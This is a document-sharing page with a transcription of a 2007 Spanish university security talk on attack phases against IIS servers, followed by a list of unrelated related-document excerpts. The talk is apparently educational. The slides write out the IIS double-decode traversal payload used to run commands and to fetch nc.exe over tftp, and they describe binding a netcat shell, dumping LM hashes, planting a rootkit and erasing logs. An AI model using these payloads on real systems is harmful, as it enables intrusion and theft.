La Praxis del Cracker
|
|
- Salvador Ayala Sandoval
- hace 5 años
- Vistas:
Transcripción
1 La Praxis del Cracker Miguel Torrealba S. Universidad Simón Bolívar Venezuela LACNIC X - Marzo Margarita
2 GISTI USB Laboratorio de Seguridad en Tecnología de la Información
3 La seguridad informática práctica es una sucesión de acciones y reacciones, de ataques y de defensas. Simson Garfinkel y Eugene Spafford (1999)
4
5 Footprinting (Hallar el Rastro)
6
7
8
9
10
11
12
13 Scanning (Exploración)
14
15
16
17
18
19
20 - La salida ya provee un indicio del servidor web que se está ejecutando y del puerto que está atendiendo las peticiones - Empleando otras herramientas como nmap de Fyodor, que identifican el sistema operativo usando TCP Stack Fingerprinting se puede obtener una información más confiable
21
22
23 Enumeration (Enumeración)
24
25
26
27
28
29
30
31
32
33
34
35
36 Gainning Access (Ganar Acceso)
37 %255c../.. %255c../winnt/system32/cmd.exe? c+dir+c:\ - Explotando la vulnerabilidad Decode del IIS 4.0 y 5.0, el Cracker puede examinar el contenido de cualquier carpeta del sistema víctima. - Para lograr eso solo requiere ejecutar el comando dir de la consola de comandos través del servidor La Praxis del Cracker amts Margarita 2007
38 %255c../.. %255c../winnt/system32/cmd.exe? c+dir+c:\ -..%255c.. =..(%25)5c.. =..%5c.. =..(%5c).. =.. \ Estructura lógica del disco de Jeremias: C: \ Inetpub \ scripts \
39
40
41
42
43
44
45
46 %255c../.. %255c../winnt/system32/cmd.exe? c+c:\winnt/system32/tftp.exe+i get+nc.exe - Explotando la vulnerabilidad Decode del IIS 4.0 y 5.0, el Cracker puede ejecutar el cliente ftp para transferir los archivos que desee al sistema víctima.
47
48
49
50 %255c../.. %255c../winnt/system32/cmd.exe? c+dir+c:\inetpub\scripts - Explotando la vulnerabilidad Decode del IIS 4.0 y 5.0, el Cracker puede verificar que el archivo que deseaba transferir al sistema víctima llegó correctamente y en cual carpeta reposa.
51
52 Hora de transferir un exploit - Httpodbc.dll es una biblioteca de enlace dinámica que permitirá al Cracker ejecutar, por medio del navegador, un programa que elevará los privilegios de ejecución y proveerá una interfaz más amigable. Se podrá así, ejecutar cualquier otro programa que se quiera, explotando la misma vulnerabilidad Decode del IIS 4.0 y Para el servidor web del sistema de la víctima este programa parecerá un código script que ha sido colocado para que los usuarios finales lo ejecuten
53
54
55
56
57
58
59
60 Ya es posible ejecutar, en forma más fácil, cualquier comando del sistema de operación a través del servidor web IIS 4.0 o 5.0
61 Escalating Privilege (Escalar Privilegios)
62
63 Con esta orden se procede a ejecutar NETCAT la navaja del ejército suizo de Hackers de sombrero blanco y negro, que activa una consola de comandos en el puerto 7001 del sistema víctima Un nuevo servicio de comandos queda escuchando desde ese instante
64
65
66
67
68 Desde una consola de comandos local el atacante- ejecuta ahora un telnet al puerto 7001 del sistema de la víctima La idea es disponer de un login remoto que permita ejecutar comandos en el sistema víctima Telnet puede operar entre equipos con diferentes Sistemas de Operación y provee un terminal virtual en la red
69
70 Con el Telnet se ha establecido una conexión TCP a la consola de comandos que escucha peticiones en el puerto 7001 del sistema víctima. Recuérdese que Telnet maneja ambos extremos del canal en forma simétrica Telnet permite además ver la salida de la ejecución de la órdenes remotas en la pantalla local. Es un servicio transparente Cualquier orden en el sistema víctima es posible de ser ejecutada, con todos los privilegios y en forma tan amigable que parecería ser un comando local
71
72
73
74
75 Pilfering (Ratería, Vileza, Bajeza, Ruindad)
76 El Cracker extrae entonces las cuentas y los LM Hashes de las contraseñas. Posteriormente puede usar un programa tipo Crackeador
77 Esta es una posible salida de lo que se obtendría. De esta forma el Cracker puede ahora suplantar a los usuarios autorizados en el sistema
78 Creating Backdoors (Crear las Puertas Traseras)
79 Ahora el Cracker puede sembrar calquier programa tipo backdoor que le permita volver a entrar en el sistema víctima y ganar privilegios, incluso si la vulnerabilidad Decode del IIS 4.0 y 5.0 es subsanada
80
81
82 Rootkit HD 1.0 versión de evaluación - Opera en sistemas WNT/W2K/WXP - Parecido a un troyano, pero con características adicionales para ocultar su existencia y ejecución. Intercepta las llamadas a la API Win32 de Windows y altera la respuesta - Genera un nuevo servicio Hacker Defender 100 sobre cualquier puerto del sistema víctima y se comunica con el atacante a través de un programa cliente bdclient - Puede adaptar su funcionamiento para disponer de distintas formas de operación - Provee facilidad de contraseña para controlar su ejecución
83 Covering Tracks (Cubrir las Huellas)
84 Finalmente, si se han transferido programas para alterar los logs, el Cracker puede borrar fácilmente toda huella de su actividad. En caso contrario puede hacerlo manualmente
85
86
87
88
89 Un administrador medianamente experimentado sospechará de inmediato si observa una salida como la anterior y la de abajo
90 CIERRE Conoced al enemigo y conoceos vos mismos; en cien batallas nunca correréis ningún peligro. Sun Tzu El Arte de la Guerra
Presentación del curso Presencial
Presentación del curso Presencial Seguridad Informática y Hacking Ético Módulo I Tabla de contenido Presentación del curso... 3 Objetivos de aprendizaje... 5 Contenidos del curso... 6 Competencias previas...
Más detallesSeguridad y Alta Disponibilidad: Ataques
Seguridad y Alta Disponibilidad: Ataques Jesús Moreno León Alberto Molina Coballes jesus.moreno.edu@ juntadeandalucía.es Septiembre 2012 Jesús Moreno León, Alberto Molina Coballes Septiembre de 2012 Algunos
Más detallesLECCION-2. Por omitir las cosas triviales se comenten grandes errores. Cursos de Entrenamiento de Servidores Linux y Telefonía IP con Asterisk/Elastix
LECCION-2 CONFIGURACION DE APLICATIVOS DE ACCESO REMOTO En esta lección, aprenderemos como configurar los programas aplicativos para acceder remotamente al servidor Elastix desde la interfaz grafica Web
Más detallesConsideraciones básicas de seguridad
Buenas prácticas de seguridad para servidores windows Consideraciones básicas de seguridad Deshabilita los usuarios de invitado (guest) En algunas versiones de windows los usuarios de invitado vienen por
Más detallesPues nos adentramos de lleno y desde hoy, a las técnicas, tácticas y contramedidas utilizadas en el Ethical Hacking (Hacking Ético).
Pues nos adentramos de lleno y desde hoy, a las técnicas, tácticas y contramedidas utilizadas en el Ethical Hacking (Hacking Ético). Comenzamos con algunos laboratorios sencillos y simples que nos permitirán
Más detallesMETASPLOITABLE2: ANÁLISIS DE VULNERABILIDADES
[Escriba aquí] [Escriba aquí] [Escriba aquí] METASPLOITABLE2: ANÁLISIS DE VULNERABILIDADES Mikel Xabier Marturet Artiaga Contenido METASPOITABLE 2: ANÁLISIS DE VULNERABILIDADES... 1 PUERTO 512:TCP... 4
Más detallesPRÁCTICAS FTP CLIENTES
1.-Uso del navegador como cliente FTP. Para utilizar el navegador como cliente basta con teclear la URL del servidor en la barra de direcciones. Para navegar por las carpetas, simplemente pinchamos en
Más detallesTEMA: LOS SISTEMAS OPERATIVOS
TEMA 1. LOS SISTEMAS OPERATIVOS 1 Introducción En este tema, estudiaremos los sistemas operativos como el primer software que necesita cargar el ordenador en el arranque, y que tiene la responsabilidad
Más detallesSEGURIDAD Y ALTA DISPONIBILIDAD
SEGURIDAD Y ALTA DISPONIBILIDAD 1 Nombre: Existen diferentes vulnerabilidades que, dependiendo de sus características, las podemos clasificar e identificar en los siguientes tipos: De configuración: Si
Más detallesMANUAL DE ADMINISTRACIÓN BÁSICA v. 1.0
skina@skinatech.com http://www.skinatech.com PBX.: 226-2080 Mobile:310 288-0916 Carrera 64 # 96-17 Bogotá D.C. MANUAL DE ADMINISTRACIÓN BÁSICA v. 1.0 Skina Tech Ltda brinda soluciones informáticas optimizando
Más detallesInfraestructura RDS 2016
105 Capítulo 3 Infraestructura RDS 2016 1. Introducción Infraestructura RDS 2016 Una infraestructura RDS 2016 se compone de varios servidores cada uno con un rol bien definido para satisfacer las demandas
Más detallesEthical Hacking. Programa de Estudio.
Ethical Hacking Programa de Estudio Ethical Hacking Aprende las técnicas más utilizadas por los hackers y cómo utilizarlas para analizar la seguridad de las redes empresariales. Vas a conocer los conceptos
Más detallesAuditando con Nmap y sus scripts para escanear vulnerabilidades
Auditando con Nmap y sus scripts para escanear vulnerabilidades Actualmente existen diversas herramientas de seguridad que se encargan de ejecutar diferentes funcionalidades, y si hablamos de auditorías
Más detallesManual de utilización del Tablón de Docencia de la Universidad de Granada.
Manual de utilización del Tablón de Docencia de la Universidad de Granada. INTRODUCCIÓN El objetivo de este tablón virtual es el facilitar el intercambio de información electrónica entre los participantes
Más detalles3æPROTOCOLOSYFUNCIONALIDADDELACAPADEAPLICACIÓN 3.0INTRODUCCIÓNDELCAPITULO
3æPROTOCOLOSYFUNCIONALIDADDELACAPADEAPLICACIÓN 3.0.1Introduccióndelcapitulo 3.0INTRODUCCIÓNDELCAPITULO LamayoríadenosotroseperimentamosInternetatravésdeWorldWideWeb,serviciosdeermailyprogramaspara compartirarchivos.éstasymuchasotrasaplicacionesproporcionanlainterfazhumanaalaredsubyacente,loquenos
Más detallesCentOS & Ubuntu Linux
Duración: 40 Horas Descripción del Curso: Este curso es para los usuarios de Linux que desean comenzar a construir habilidades desde nivel principiante y llegar a la administración de operativo, a un nivel
Más detallesCaso actual: el malware DNSChanger Qué pueden hacer ahora los usuarios de ordenadores?
Caso actual: el malware DNSChanger Qué pueden hacer ahora los usuarios de ordenadores? Contenido Qué ha ocurrido hasta ahora? 2 Qué va a ocurrir el 8 de marzo de 2012? 2 Cómo puedo probar mi configuración
Más detallesPresentación del Curso Presencial LINUX - LPIC: MANEJO Y ADMINISTRACIÓN DE SISTEMAS OPERATIVOS DE CODIGO ABIERTO
Presentación del Curso Presencial LINUX - LPIC: MANEJO Y ADMINISTRACIÓN DE SISTEMAS OPERATIVOS DE CODIGO ABIERTO Tabla de contenido LINUX - LPIC... 3 Presentación del curso... 3 Objetivos de aprendizaje...
Más detallesGeneración de Certificados SSL con IIS
Generación de Certificados SSL con IIS Certicámara S.A USO: EXTERNO Página 1 de 41 CONTROL DE ACTUALIZACIONES Generación de Certificados SSL con IIS VERSIÓN 4.O VERSION FECHA ELABORADO REVISADO APROBADO
Más detallesConexión al servidor guernika y manipulación de archivos DESDE FUERA DE LAS AULAS
ESCUELA POLITÉCNICA SUPERIOR LABORATORIO DEL DEPARTAMENTO DE INFORMÁTICA Conexión al servidor guernika y manipulación de archivos DESDE FUERA DE LAS AULAS Laboratorio del Departamento de Informática Universidad
Más detallesPROTOCOLO FTP PROTOCOLO DE TRANSFERENCIA DE ARCHIVOS ING. RAUL BAREÑO GUTIERREZ RAUL BAREÑO GUTIERREZ 1
PROTOCOLO FTP PROTOCOLO DE TRANSFERENCIA DE ARCHIVOS RAUL BAREÑO GUTIERREZ 1 FTP. Qué es? Es un protocolo que permite pasar ficheros de un computador que los tiene (servidor FTP) a un computador que los
Más detallesABC de la ciberseguridad. Por: Gizard G.
ABC de la ciberseguridad Por: Gizard G. Adware Adware Que es? Software publicitario, le permite a un programador ofrecer sus productos de forma gratuita y convertirlos en dinero. Son pagados por una agencia
Más detallesWorkshop: Escritorios y aplicaciones virtuales con VMware Horizon y App Volumes
Workshop: Escritorios y aplicaciones virtuales con VMware Horizon y App Volumes Al terminar el workshop, debe ser capaz de alcanzar los siguientes objetivos: Identificar los componentes de VMware Horizon
Más detalleseica IT DDesenvolvemento e Formación
OPEN SYSTEM eica IT DDesenvolvemento e Formación HACKING ÉTICO CARACTERÍSTICAS DURACIÓN Solicita información OBJETIVOS El programa de estudios prepara a: Responsables de red informática o responsables
Más detallesConexión de Sistemas en Red
Conexión de Sistemas en Red Ingresar Módulo de Red al Sistema Si usted ha adquirido el módulo de red para su sistema, deberá realizar los siguientes pasos para que éste quede configurado y listo para que
Más detallesEl Hacking Ético y los Grupos Hackitivistas Anonymous y Lulzsec
Metodología. www.dsteamseguridad.com La Metodología de la charla esta guiada por el concepto de cada una de las fases de ataque, con su respectiva demostración Arquitectura de Red (Laboratorio Virtual)
Más detallesPráctica de laboratorio: Instalación de Linux en una máquina virtual y exploración de la GUI
Práctica de laboratorio: Instalación de Linux en una máquina virtual y exploración de la GUI Objetivos Parte 1: Preparar una computadora para la virtualización Parte 2: Instalar un sistema operativo Linux
Más detallesMigración de una base de datos a otro servidor de Base de Datos en MySQL (mapaches)
Migración de una base de datos a otro servidor de Base de Datos en MySQL (mapaches) La migración de una base de datos es muy fácil utilizando el programa phpmyadmin en el cual se selecciona la base de
Más detallesANALISIS DE VULNERABILIDADES
I. DIRIGIDO A. RICARDO ORTIZ LESTRADE ERIC HERRERO LOZANO MIGUEL ANGEL LEITE GOMEZ EMANUEL URBINA GARCIA COORDINADOR OFICINA PROYECTOS COORDINADOR CONTROL DE CAMBIO ADMON. SERV. RESPONSABLE GENERAL DE
Más detallesANÁLISIS DE LAS PRINCIPALES VULNERABILIDADES DE UN SISTEMA INFORMÁTICO
ANÁLISIS DE LAS PRINCIPALES VULNERABILIDADES DE UN SISTEMA INFORMÁTICO Luis Villalta Márquez INTRODUCCIÓN Existen diferentes vulnerabilidades que, dependiendo de sus características, las podemos clasificar
Más detallesACCESO A LA PLATAFORMA VIRTUAL DE APLICACIONES
ACCESO A LA PLATAFORMA VIRTUAL DE APLICACIONES Contenido Introducción... 3 Acceso... 4 Configuración para WINDOWS (Acceso Web)... 5 Configuración para UBUNTU/LINUX (Acceso Web)... 8 Configuración para
Más detallesPRUEBAS DE PENETRACIÓN EN AMBIENTES DE NUBE. Ing. Javier Hernández Calderón Consultor en Seguridad Informática
PRUEBAS DE PENETRACIÓN EN AMBIENTES DE NUBE Ing. Javier Hernández Calderón Consultor en Seguridad Informática Que es la nube de internet? Dónde están las aplicaciones y mis datos? Acceso, desde cualquier
Más detallesQwertyuiopasdfghjklzxcvbnmqwerty uiopas_redes_de_comunicación_ghjkl zn_vulnerabilidades_intrusiones_mq wertyuiopasdfghjklzxcvbnmqwertyui
Qwertyuiopasdfghjklzxcvbnmqwerty uiopas_redes_de_comunicación_ghjkl zn_vulnerabilidades_intrusiones_mq wertyuiopasdfghjklzxcvbnmqwertyui Vulnerabilidades e Intrusiones opasdfghjklzxcvbnmqwertyuiopasdfg
Más detallesTrabajo 6 ADMINISTRACIÓN REMOTA Y SERVIDOR DE APLICACIONES EN WINDOWS. Hecho por Jesús López y Jesús Losada.
Trabajo 6 ADMINISTRACIÓN REMOTA Y SERVIDOR DE APLICACIONES EN WINDOWS Hecho por Jesús López y Jesús Losada. 1 Índice Qué es la administración remota? Que servicios ofrece? Acceso en modo Texto Telnet SSH
Más detallesInternal Hacking y contramedidas en entorno Windows Pirateo interno, medidas de protección, desarrollo de herramientas
Introducción 1. Preámbulo 15 2. Desciframiento de un ataque conseguido 17 3. Descifrado de contramedidas eficaces 18 3.1 Análisis de riesgos reales 18 3.2 Consideraciones técnicas 19 3.3 Consideraciones
Más detallesINTRODUCCION. Tema: Protocolo de la Capa de aplicación. FTP HTTP. Autor: Julio Cesar Morejon Rios
INTRODUCCION Tema: Protocolo de la Capa de aplicación. FTP HTTP Autor: Julio Cesar Morejon Rios Qué es FTP? FTP (File Transfer Protocol) es un protocolo de transferencia de archivos entre sistemas conectados
Más detallesCertified Ethical Hacker Duración: 40 horas Código: CEH-001
Certified Ethical Hacker Duración: 40 horas Código: CEH-001 Descripción: En el presente curso, el participante obtiene el conocimiento para poder ingresar como si fuera un intruso real para evaluar seguridad
Más detallesESTRATEGIAS PARA LA RECOLECCIÓN DE PRUEBAS ELECTRÓNICAS
ESTRATEGIAS PARA LA RECOLECCIÓN DE PRUEBAS ELECTRÓNICAS Llevar un orden de recopilación de información Si la recolección de datos se realiza correctamente y de una manera ordenada, es mucho más útil en
Más detallesMódulo Call Center. Guía de instalación v 1.2
Módulo Call Center Guía de instalación v 1.2 DINOMI Septiembre 2018 TABLA DE CONTENIDO CONFIGURACIÓN DE DINOMI... 4 PASO 1: INSTALACIÓN DE DINOMI... 4 PASO 2: CONEXIÓN A UN PBX EXTERNO... 8 CREACIÓN DE
Más detallesInstalación de Crystal Reports
Instalación de Crystal Reports Este capítulo explica cómo se instala Crystal Reports localmente desde el CD del producto. También explica cómo instalar Crystal Reports en un servidor de red y cómo instalarlo
Más detallesAprenda Seguridad Ofensiva Conviértase en Hacker Ético!
Aprenda Seguridad Ofensiva Conviértase en Hacker Ético! INTRO-HACKING WORKSHOP Dirigido a: Profesionales y Estudiantes de Sistemas, Redes, Auditoría y Seguridad Informática. Seminario práctico intensivo
Más detallesMetasploit framework, al igual que nessus, su versión paga es mucho más informática que la gratuita.
Ethical Hacking en modo Gráfico Herramientas para hacking ético hay muchas, las profesionales o pagas ofrecen informes mucho más detallados que las no pagas, pero ambas nos dan un indicio de que es lo
Más detallesSeguridad Informática: Técnicas hacker
Seguridad Informática: Técnicas hacker Jesús Moreno León j.morenol@gmail.com Septiembre 2010 Estas diapositias son una obra derivada de los seminarios de formación impartidos por por Marta Beltrán y Antonio
Más detallesTEMARIO CERTIFICACIÓN DE SEGURIDAD OFENSIVA G.H.O.S.T
TEMARIO CERTIFICACIÓN DE SEGURIDAD OFENSIVA G.H.O.S.T Dirigido a: Estudiantes y profesionistas que busquen aprender sobre seguridad informática desde una base práctica. El curso está diseñado para principiantes,
Más detallesModelo OSI y TCP/IP. Teleprocesamiento Ing. Zoila Marquez.
Modelo OSI y TCP/IP Teleprocesamiento Ing. Zoila Marquez. Modelo OSI El Modelo OSI divide en 7 capas el proceso de transmisión de la información entre equipo informáticos, donde cada capa se encarga de
Más detallesCETIC CHIAPAS. Coordinacion Estatal de Tecnologias de la Informacion y Comunicaciones RANSOMWARE WANNACRY. Pá giná 1
Coordinacion Estatal de Tecnologias de la Informacion y Comunicaciones RANSOMWARE WANNACRY Pá giná 1 Amenaza Ránsonwáre WánnáCry es un málwáre que áfectá á sistemás operátivos Windows el cuál cifrá árchivos
Más detallesUD5 Actividad 1 Utilización cliente FTP (mediante línea de comandos, entornos gráficos y navegadores/exploradores)
2011-2012 UD5 Actividad 1 Utilización cliente FTP (mediante línea de comandos, entornos gráficos y José Jiménez Arias IES Gregorio Prieto MEDIANTE LINEA COMANDOS: Creamos un directorio, de nombre "pruebasftpasir04"
Más detallesECBTI Curso Herramientas Teleinformaticas MALWARE. Red de Tutores Herramientas TeleInformáticas
ECBTI Curso Herramientas Teleinformaticas-201120 MALWARE Red de Tutores Herramientas TeleInformáticas Definición Es un software malicioso o software malintencionado, cuyo objetivo es infiltrarse para dañar
Más detallesMultiplatform Network Administrator (160 Horas)
En este curso, el participante instalará y configurará los sistemas operativos. Además, identificará las características de los entornos de gestión y realizará las tareas administrativas. Así mismo, ejecutará
Más detallesNETCAT. En una de las máquina ponemos el netcat en modo servidor, a la escucha. En la otra, lo ponemos en modo cliente.
NETCAT 1. Descripción Netcat es una utilidad imprescindible para todo profesional de la seguridad. Es denominada la "navaja suiza de la seguridad de red" porque sirve para innumerables cosas. Fue creada
Más detallesINSTALACION Y CONFIGURACION OPENSTACK. La instalación de OpenStack se realiza sobre el sistema operativo Ubuntu LTS Desktop.
INSTALACION Y CONFIGURACION OPENSTACK La instalación de OpenStack se realiza sobre el sistema operativo Ubuntu 14.04 LTS Desktop. Se comprueba si los scripts de configuración de OpenStack están disponibles
Más detallesEJERCICIOS DE GUADALINEX V9 08
1. Crea un usuario denominado ejer8 con contraseña profeciclos (Utiliza el modo consola o un terminal), anota aquí la orden que darías. 2. Añade privilegios de administrador al usuario creado. (Utiliza
Más detallesHacking en 5 pasos usando Software libre
Hacking en 5 pasos usando Ponente: JUAN DAVID BERRIO LOPEZ judabe2003@gmail.com Ingeniero en Informática. Especialista en redes Universidad san Buenaventura Posgrado en Seguridad Redes UOC, CCNSP Cyberoam/India
Más detallesManual para configurar un servidor AppServ En una computadora. Y operar el sistema SICAM en intranet. Nucúncu Tecnología
Manual para configurar un servidor AppServ En una computadora. Y operar el sistema SICAM en intranet. Nucúncu Tecnología www.nucuncu.com Nucúncu Tecnología. www.nucuncu.com Manual para configurar un servidor
Más detallesCualquier equipo conectado a una red informática puede ser vulnerable a un ataque.
Unidad 2: Ethical Hacking Introducción al Hacking Ético 1 El concepto de "hacking ético" o ethical hacking nace para cubrir un tipo de actividades en las que expertos en seguridad informática, utilizan
Más detallesCompartir ficheros entre Macintosh vía TCP/IP
Compartir ficheros entre Macintosh vía TCP/IP Este documento describe como compartir ficheros de un ordenador Mac con otro usuario de Mac utilizando TCP/IP. Para poder servir ficheros se debe estar ejecutando
Más detallesPráctica de laboratorio: Control y administración de recursos del sistema en Windows Vista
IT Essentials 5.0 5.3.3.6. Práctica de laboratorio: Control y administración de recursos del sistema en Windows Vista Introducción Imprima y complete esta práctica de laboratorio. En esta práctica de laboratorio,
Más detallesSwitch Conmutador KVM Remoto de 1 Puerto VGA PS/2 USB por IP con Virtual Media
Switch Conmutador KVM Remoto de 1 Puerto VGA PS/2 USB por IP con Virtual Media Product ID: SV1108IPEXEU El conmutador KVM a través de IP con control remoto de servidor y 1 puerto USB PS/2 con medios virtuales,
Más detallesCon arreglo a lo expuesto en el punto 2, nuestros ordenadores tienen instaladas las siguientes máquinas virtuales:
Guía de usuario de Virtual PC 2 Contenido 1.- Introducción.... 2 2.- Necesito una Máquina Virtual?... 2 3.- Máquinas Virtuales disponibles.... 2 4.- Manejo de la aplicación... 3 4.1.- Manejo básico....
Más detallesFTP y Telnet. FTP /// Protocolo de transferencia de archivos (protocol transfer files) :) TELNET /// Emulador de terminales en sistemas remotos.
FTP y Telnet La explicación va dirigida a usuarios con Microsoft Windows, ya que es el sistema operativo más usado, pero cabe decir que tanto en linux, UNIX, etc. FTP /// Protocolo de transferencia de
Más detallesEscaneo de un sistema con Backtrack 4
Escaneo de un sistema con Backtrack 4 El escaneo de un sistema es el siguiente paso a llevar después de haber conocido nuestro objetivo, debemos puerto o que medios de comunicación esta utilizando. Vamos
Más detalles4.4. TCP/IP - Configuración Parte 2 SIRL
4.4. TCP/IP - Configuración Parte 2 SIRL Configuración de parámetros de red Elementos de configuración relacionados con TCP/IP DIRECCIÓN IP Que se asigna al equipo MÁSCARA DE SUBRED Asignada al equipo
Más detallesJavier Garson Desarrollador web Abril CSRF Falsificando peticiones
Javier Garson Desarrollador web Abril 2016 CSRF Falsificando peticiones Acerca de mi Javier Garson Aparicio Desarrollador web 4 años de experiencia en desarrollo web 2 años de experiencia haciendo pruebas
Más detallesSolución al Primer Reto
En el reto que se planteaba en el primer articulo se pedía conseguir toda la información posible sobre la maquina virtual que se suministra y a través de dicha información descubrir vulnerabilidades e
Más detallesCómo puede SmartMonitor Instalar la Base de Datos en. el dispositivo NAS a través de iscsi?
Cómo puede SmartMonitor Instalar la Base de Datos en el dispositivo NAS a través de iscsi? Prólogo SCSI (Small Computer System Interface) ofrece una interfaz de transmisión de datos con alta velocidad
Más detallesFUNDACIÓN TECNOLÓGICA DE COSTA RICA Instituto Tecnológico de Costa Rica. Configuración básica de un enrutador inalámbrico
FUNDACIÓN TECNOLÓGICA DE COSTA RICA Instituto Tecnológico de Costa Rica Curso: Redes Inalámbricas Medio: Práctica #1 Instructor: Ing. Eduardo Interiano. Configuración básica de un enrutador inalámbrico
Más detallesINSTITUTO TECNOLÓGICO DE LAS AMÉRICA ITLA
INSTITUTO TECNOLÓGICO DE LAS AMÉRICA ITLA How to de como habilitar el servicio de SSH en slackware. Carlos Juan Shephard G 2013-610 Sistema Operativo III Instructor: José Doñe OpenSSH es una versión LIBRE
Más detallesSwitch Conmutador KVM Remoto de 1 Puerto VGA PS/2 USB por IP con Virtual Media Power Control
Switch Conmutador KVM Remoto de 1 Puerto VGA PS/2 USB por IP con Virtual Media Power Control Product ID: SV1108IPPWEU El conmutador KVM a través de IP con control remoto de 1 puerto y control de alimentación
Más detallesSOR - Examen Teorico. 1 of 8 2/4/ :27 PM. Paralelo 1? Evaluaciones? SOR Examen Teorico. Comenzado: Feb 4 en 11:27pm
Paralelo 1? Evaluaciones? SOR Examen Teorico SOR - Examen Teorico Comenzado: Feb 4 en 11:27pm Question 1: 1 puntos El encargado de gestionar los permisos y los recursos es el [ Seleccionar ]. Question
Más detalles1. Introducción. 2. Traza remoto. 2.1 Borrar cliente antiguo de la cache de Java
1. Introducción La presente guía muestra los pasos para instalar o reinstalar la versión local de Traza 5.x así como acceder al Traza del servidor de APYDE en un equipo con Windows 10 (32/64 bits) en el
Más detallesSISTEMAS OPERATIVOS - DEFINICIÓN:
1/5 SISTEMAS OPERATIVOS - DEFINICIÓN: programa que controla la ejecución de los programas de aplicación y que actúa como interfaz entre las aplicaciones del usuario y el HW de una computadora - OBJETIVOS:
Más detallesinfo.uruguay@isec-global.com 4342-4685 4342-2079 4342-5440 www.isec-global.com
thical Ethical La permanente exposición al riesgo de robo, extravío, alteración o delitos sobre la información confidencial de las empresas, las sitúa en una posición bastante delicada y critica, por lo
Más detallesPENTESTING CON KALI LINUX
PENTESTING CON KALI LINUX Antecedentes Debido a la dependencia actual en la tecnología, las empresas no se pueden dar el lujo de desproteger el acceso a sus redes y sistemas con el riesgo de ver comprometida
Más detallesProyecto Fin de Carrera
Proyecto Fin de Carrera Capítulo 2: Memoria Descriptiva Página 15 de 265 Capítulo 2: Memoria Descriptiva 3. Objetivo del proyecto En este proyecto se desarrolla una aplicación basada en algunas de las
Más detallesDirección General de Educación Superior Tecnológica INSTITUTO TECNOLÓGICO DE SALINA CRUZ
Dirección General de Educación Superior Tecnológica INSTITUTO TECNOLÓGICO DE SALINA CRUZ UNIDAD 5: ETERNETH ACTIVIDAD: REPORTE CAPITULO 11 CONFIGURACION Y VERIFICACION DE UNA RED MATERIA: FUNDAMENTOS DE
Más detallesUsuario y contraseña de fábrica FW5850 ID de administrador Contraseña de administrador root
Guía de configuración Dirección IP FlexWatch Explorer Equipos FlexWatch TM 5850 Usuario y contraseña de fábrica FW5850 ID de administrador root Contraseña de administrador root 1 +[Antes de comenzar realice
Más detallesi r s i d PENTEST 1 v e
i r u g e S e d o Curs d a d i l i b i n o p s i d ra o L P E C a t l a y d a d lla) i v e S ( del Río PENTEST 1 Licencia Estas diapositivas han sido realizadas para el curso Seguridad y Alta Disponibilidad
Más detallesCapítulo 2 Roles y características
17 Capítulo 2 Roles y características 1. Introducción Roles y características Los siguientes roles y características son una pequeña lista de aquellos presentes en Windows Server 2012. 2. Roles Desde Windows
Más detallesCrear un servidor Web en IIS
Crear un servidor Web en IIS Qué es un servidor web? Un servidor web es un programa que se ejecuta continuamente en un computador, manteniéndose a la espera de peticiones de ejecución que le hará un cliente
Más detallesCualidades de la seguridad de la información 59 Metodología para mejorar la seguridad de la información 61 Retos en la seguridad de la información 66
Índice Índice 1 Introducción 10 Para quién es este libro? 11 Estructura del libro 12 Cómo obtener ayuda 15 Fundamentos 15 Linux 16 Terminal de Linux 18 Instalando herramientas 23 Interfaz de red 26 Redes,
Más detallesMetaSploit, tomar control de equipos remotos
MetaSploit, tomar control de equipos remotos MetaSploit es una suite o conjunto de programas en realidad. Está diseñada para explotar las vulnerabilidades de los equipos y es sin duda el programa más usado
Más detallesRoles y características
15 Capítulo 1 Roles y características 1. Organización del libro Roles y características El libro se compone de 18 capítulos, que presentan las distintas características del sistema operativo Windows Server
Más detalles[ MANUAL PARA USUARIOS DE GNU/LINUX ]
HISPASEC PINKERTON [ MANUAL PARA USUARIOS DE GNU/LINUX ] Presentacion Pinkerton es un software desarrollado y facilitado por Hispasec Sistemas para realizar un análisis sobre la seguridad del sistema informático
Más detallesManual de Usuario: Servidor Cloud y Servidor Cloud Gestionado
Manual de Usuario: Servidor Cloud y Servidor Cloud Gestionado Versión 2.0 1. Contenidos Guía de Inicio 1 Qué es Servidor Cloud?... 3 2 Acceso al panel de control... 3 3 Acceso al Servidor Cloud... 5 4
Más detallesrede corporativa manual del usuario remoto para Windows
en este manual encontrarás la información necesaria para instalar y configurar el acceso remoto a la red corporativa privada teléfono_internet_televisión página 2 de 11 1 introducción... 4 2 acceso a aplicaciones
Más detallesCURSO ADMINISTRACIÓN WEB SEMANA 6 SEGURIDAD EN REDES
CURSO ADMINISTRACIÓN WEB SEMANA 6 SEGURIDAD EN REDES Qué es la seguridad de redes? Es garantizar que el funcionamiento de todas las máquinas de una red sea óptimo y que todos los usuarios de estas máquinas
Más detallesREUNIÓN DE PARTICIPANTES SEN - SESIÓN TÉCNICA - SISTEMA ELECTRÓNICO DE NEGOCIACIÓN
REUNIÓN DE PARTICIPANTES SEN - SESIÓN TÉCNICA - SISTEMA ELECTRÓNICO DE NEGOCIACIÓN Marzo 9 de 2016 AGENDA 1. Requerimientos de Hardware 2. Requerimientos de Software 3. Actualización tecnológica de las
Más detalles: COMPUTACIÓN E INFORMATICA : Ingeniería de Redes y Comunicaciones : Técnicas de Hacking : Z-RED109
I. DATOS INFORMATIVOS Carrera Especialidad Curso Código Ciclo : Sexto Requisitos Duración Horas Semana : 08 horas Versión : v.0109 II. SUMILLA: : COMPUTACIÓN E INFORMATICA : Ingeniería de Redes y Comunicaciones
Más detallesStellar Phoenix JPEG Repair 5.0. Guía de instalación
Stellar Phoenix JPEG Repair 5.0 Guía de instalación Visión General Stellar Phoenix JPEG Repair ofrece una solución completa para reparar fotografías y archivos de imagen que estén corruptos. Puede reparar
Más detallesCriptografía y Seguridad de Datos Intrusos y virus
Criptografía y Seguridad de Datos Intrusos y virus Carlos Figueira. Carlos Figueira. Universidad Simón Bolívar Basado en láminas del Profesor Henric Johnson (http://www.its.bth.se/staff/hjo/ henric.johnson@bth.se)
Más detallesSu uso esta muy extendido en Internet, siendo la nomenclatura mas utilizada la de servidor web. Hay muchos servidores en Internet y muchos tipos de
SERVIDORES Introducción En informática el término servidor alude a una computadora remota a la que los navegadores le solicitan datos desde otras computadoras. Además, los servidores pueden almacenar información
Más detallesEn este documento se detallan las diversas formas de actualizar la versión de firmware de los equipos ZyXEL.
Pág. 1/24 En este documento se detallan las diversas formas de actualizar la versión de firmware de los equipos ZyXEL. En los siguientes puntos vamos a comentar las diferentes formas de hacerlo: 1.- Mediante
Más detallesWINDOWS SERVER 2008 CORE
